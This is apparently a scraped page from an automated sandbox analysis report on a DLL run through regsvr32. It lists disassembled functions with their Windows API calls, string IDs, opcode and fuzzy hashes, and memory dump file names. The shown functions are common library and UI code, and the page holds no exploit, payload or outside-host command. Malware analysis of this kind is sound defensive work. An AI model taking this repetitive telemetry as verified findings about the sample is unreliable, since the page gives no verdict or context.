                                                                                                                                                                                    • Instruction ID: 8da9bb458c19a2d8981fc41d666f7e304be05cfa8d4ddef189530c8b9b7617a1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64a4bef3045a19651f62699f8f7f6b06069dda067427d7ee80e2164b89d45d07
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC51B432205E9882DB96AF55E5803ED73A0FB89BD0F44C526FA5A437D5DF78C689C300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001FC44 Relevance: 7.6, APIs: 5, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1310268301-0
                                                                                                                                                                                    • Opcode ID: e6c5d8ba728f0dcb7bf5a16147742b3cc7d3843224608a11f1ff0c1fb79c8644
                                                                                                                                                                                    • Instruction ID: fb2d31b84bdc592286becc738fcb00e1f14632bba21e92e7db94771b51ac62fb
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6c5d8ba728f0dcb7bf5a16147742b3cc7d3843224608a11f1ff0c1fb79c8644
                                                                                                                                                                                    • Instruction Fuzzy Hash: A7215131302A4C40EBA3ABA1F5453EAA351B74C7C4F54D835F90E1B746DE78C649C380
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180024084 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd$CallTranslator
                                                                                                                                                                                    • String ID: MOC
                                                                                                                                                                                    • API String ID: 3569367362-624257665
                                                                                                                                                                                    • Opcode ID: 6616c775d83a334c17e56d6f5e2deacf5da223c59004b66fb9269eb52e7d7877
                                                                                                                                                                                    • Instruction ID: 43cbe8c013764d56c593a2eb3bddf574111730e9c3a0797c382e77f9bba1149b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6616c775d83a334c17e56d6f5e2deacf5da223c59004b66fb9269eb52e7d7877
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A61BF73604AC885DBA2CB15E0803EDB3A1F789BC9F448516FB494BB99DF78C25AC700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180001F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99windowCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$MessageSend$Text
                                                                                                                                                                                    • String ID: ...
                                                                                                                                                                                    • API String ID: 1325759018-440645147
                                                                                                                                                                                    • Opcode ID: 3f60d8f227ee4c4739953c51ea1781717f8ecb094c1c8ad408cf4acfc06b07ad
                                                                                                                                                                                    • Instruction ID: d4da3af2b34edc9fea6ca488a88eefcb891b5f7f437bcb17ce60630753295906
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f60d8f227ee4c4739953c51ea1781717f8ecb094c1c8ad408cf4acfc06b07ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 55418172714E4882EB86DB29D85079E7360FB85BF5F408311EA3983AE5DF69CA49C700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180010BB8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CriticalSection$AddressEnterFreeInitializeLeaveLibraryProc
                                                                                                                                                                                    • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                                                                                    • API String ID: 3379933665-63838506
                                                                                                                                                                                    • Opcode ID: 24ff9b3a42056d7f1fb5ebd3d4b665974d780c372db38e1e83173bec7e5a9e30
                                                                                                                                                                                    • Instruction ID: 3d2bce948b43eef7ee7bb53023e598d1ebf2c1fb6cc7cf138f49637fc99d2b8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 24ff9b3a42056d7f1fb5ebd3d4b665974d780c372db38e1e83173bec7e5a9e30
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA216A31211F4881EB96DB11E84039973A0F78DBC8F949525FA494B795EF78DA48C780
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000C0B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: System$Metrics$InfoParameters
                                                                                                                                                                                    • String ID: DISPLAY
                                                                                                                                                                                    • API String ID: 3136151823-865373369
                                                                                                                                                                                    • Opcode ID: 3b642516bface9a6dcb8a5ec951136eb8bf72609a9aa77bd2d526a02dfbe0c01
                                                                                                                                                                                    • Instruction ID: 0170c18efbc9a9c9a335727720e9ce013c3621ff0ae234076072a75871cc08bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b642516bface9a6dcb8a5ec951136eb8bf72609a9aa77bd2d526a02dfbe0c01
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B11B172600689C6EB96CF24D544BE9B3A1F78DBC9F18C021EA4546295DF38C65CC741
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001BAAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ClassCompareLongNameStringWindow
                                                                                                                                                                                    • String ID: combobox
                                                                                                                                                                                    • API String ID: 1414938635-2240613097
                                                                                                                                                                                    • Opcode ID: 58d9aebcb3128cc2fcbb4ae3a9ec58b8c4b22273ac6f3c9d67935cce624ccf04
                                                                                                                                                                                    • Instruction ID: b3def97b1fa0067af54b2dec515cadf843c4037e2efbad05e44f130277f29aa9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 58d9aebcb3128cc2fcbb4ae3a9ec58b8c4b22273ac6f3c9d67935cce624ccf04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4601A133214F4482EB628B15F45139AB3A1F78D7D0F558211F69A47BA8DF3CC649CB40
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000B858 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: ImageList_Duplicate
                                                                                                                                                                                    • API String ID: 310444273-3720651578
                                                                                                                                                                                    • Opcode ID: aa7021fa901f56359a90f058ac8fe50712b58c9e5c496761ea10096f55012edd
                                                                                                                                                                                    • Instruction ID: 148d71cfbafe6b0ed6a93e011731f4b7478dfd2da522bda92a8d62097d54fecd
                                                                                                                                                                                    • Opcode Fuzzy Hash: aa7021fa901f56359a90f058ac8fe50712b58c9e5c496761ea10096f55012edd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9101FB32602B8985EF968F25E48439D73A4E75CFC8F18C025DA4C47364DF34C999C350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000F0F8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: InitCommonControlsEx
                                                                                                                                                                                    • API String ID: 310444273-2357626986
                                                                                                                                                                                    • Opcode ID: 8dbd0aa5fde36d7b5e6cb1899159c4ed2c56fe2f7d6b24fd7874968b54380210
                                                                                                                                                                                    • Instruction ID: f62595b032523d17c900e76380b3b1b0919be40ea1c6a8f24e204b7e091af8e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dbd0aa5fde36d7b5e6cb1899159c4ed2c56fe2f7d6b24fd7874968b54380210
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B01A832201B49C5DF968F25E88439973B1E75CF98F298025DA4D47768DE34D999C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800145A8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: ImageList_Destroy
                                                                                                                                                                                    • API String ID: 310444273-3359732376
                                                                                                                                                                                    • Opcode ID: 2f69f390f08cabe971752de3f2e1f74dbad47029e8ba37f0edde313316be047c
                                                                                                                                                                                    • Instruction ID: fc9d4f3ab9812608bb7598174e0936c7842bd86c54f2c860905a51db673548c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f69f390f08cabe971752de3f2e1f74dbad47029e8ba37f0edde313316be047c
                                                                                                                                                                                    • Instruction Fuzzy Hash: B801E832202F89C9DB868F25E58039963A5E75CF98F199025DA4D4B365EE38C9D9C340
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800146D0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                    • String ID: ImageList_LoadImageA
                                                                                                                                                                                    • API String ID: 310444273-439603757
                                                                                                                                                                                    • Opcode ID: 5c8abf0ad6d0886b35202916cecf62b478a1a63f1eb341b11915c57674ea264a
                                                                                                                                                                                    • Instruction ID: b162de2cc547ba2fb40fc9625ead035fa35e3f0c253d06df2c93193ac548e298
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5c8abf0ad6d0886b35202916cecf62b478a1a63f1eb341b11915c57674ea264a
                                                                                                                                                                                    • Instruction Fuzzy Hash: F401A836206F89C5DB968F25E48439973A5F75DF88F188025DA4D4B368EF34C99AC350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180020EEC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020F35,?,?,00000000,0000000180026ED2,?,?,00000000,0000000180026F9F), ref: 0000000180020EFB
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,0000000180020F35,?,?,00000000,0000000180026ED2,?,?,00000000,0000000180026F9F), ref: 0000000180020F10
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                                                                                    • Opcode ID: 6ed72e733c6f008c7098c3b5b7f13a9d79aaf72a9cf791fed3c8d6f58eeaf8f4
                                                                                                                                                                                    • Instruction ID: 9e99631b602e4bde0e19571eee5a704d3350a5a8f3bb0223c5a7da61b52f8d31
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed72e733c6f008c7098c3b5b7f13a9d79aaf72a9cf791fed3c8d6f58eeaf8f4
                                                                                                                                                                                    • Instruction Fuzzy Hash: A0E0127075270C82FFEB9B61A8843E513516B4D7C5F499028A51E077A1EF28D75DC310
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180025E14 Relevance: 6.2, APIs: 4, Instructions: 201COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2918714741-0
                                                                                                                                                                                    • Opcode ID: 792e8745d615aee98d4485586d497814bb8477c1f23f84a82cd00b539724f549
                                                                                                                                                                                    • Instruction ID: a3bd9a9b8aab3ab6241a23ec7f6c8ac6f45c3634371f3e3fe77c0a781748e8d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 792e8745d615aee98d4485586d497814bb8477c1f23f84a82cd00b539724f549
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C8107322052C889EAE34A2895447EE7761A3597DAF28C221F7E507AD5CE36C65E8708
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180013B90 Relevance: 6.1, APIs: 4, Instructions: 124windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BitmapMenu$BitmapsCheckCreateDimensionsItemLoadMark
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 527726921-0
                                                                                                                                                                                    • Opcode ID: 7b5d86ebf2082e61a4b8e1dc66e50425af0bd6ae50d0e9893398f99941ef6f03
                                                                                                                                                                                    • Instruction ID: ab7879270879aa6b3bae8fb9ee09113f43a0085c2d092503d725c6fc7c4c0bbc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b5d86ebf2082e61a4b8e1dc66e50425af0bd6ae50d0e9893398f99941ef6f03
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A51DC32710F8886EB96DF24E8497D933A5F78CB84F858026EB4943B50EF38DA58C740
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800237D8 Relevance: 6.1, APIs: 4, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd$BaseImage
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2482573191-0
                                                                                                                                                                                    • Opcode ID: 30516852e28a952734e1d0625c4f2c86422a9109b781c16d58738f16741b2c2d
                                                                                                                                                                                    • Instruction ID: 8f55a6433e090b6ac0fbaa038653dff6cf23cafeb96d3631585517fc99e1b18f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30516852e28a952734e1d0625c4f2c86422a9109b781c16d58738f16741b2c2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31419132600A4985EBA3EB15D4823FDA791AB8DBD5F95C121FB59477E2CF34C68E8300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180002F30 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
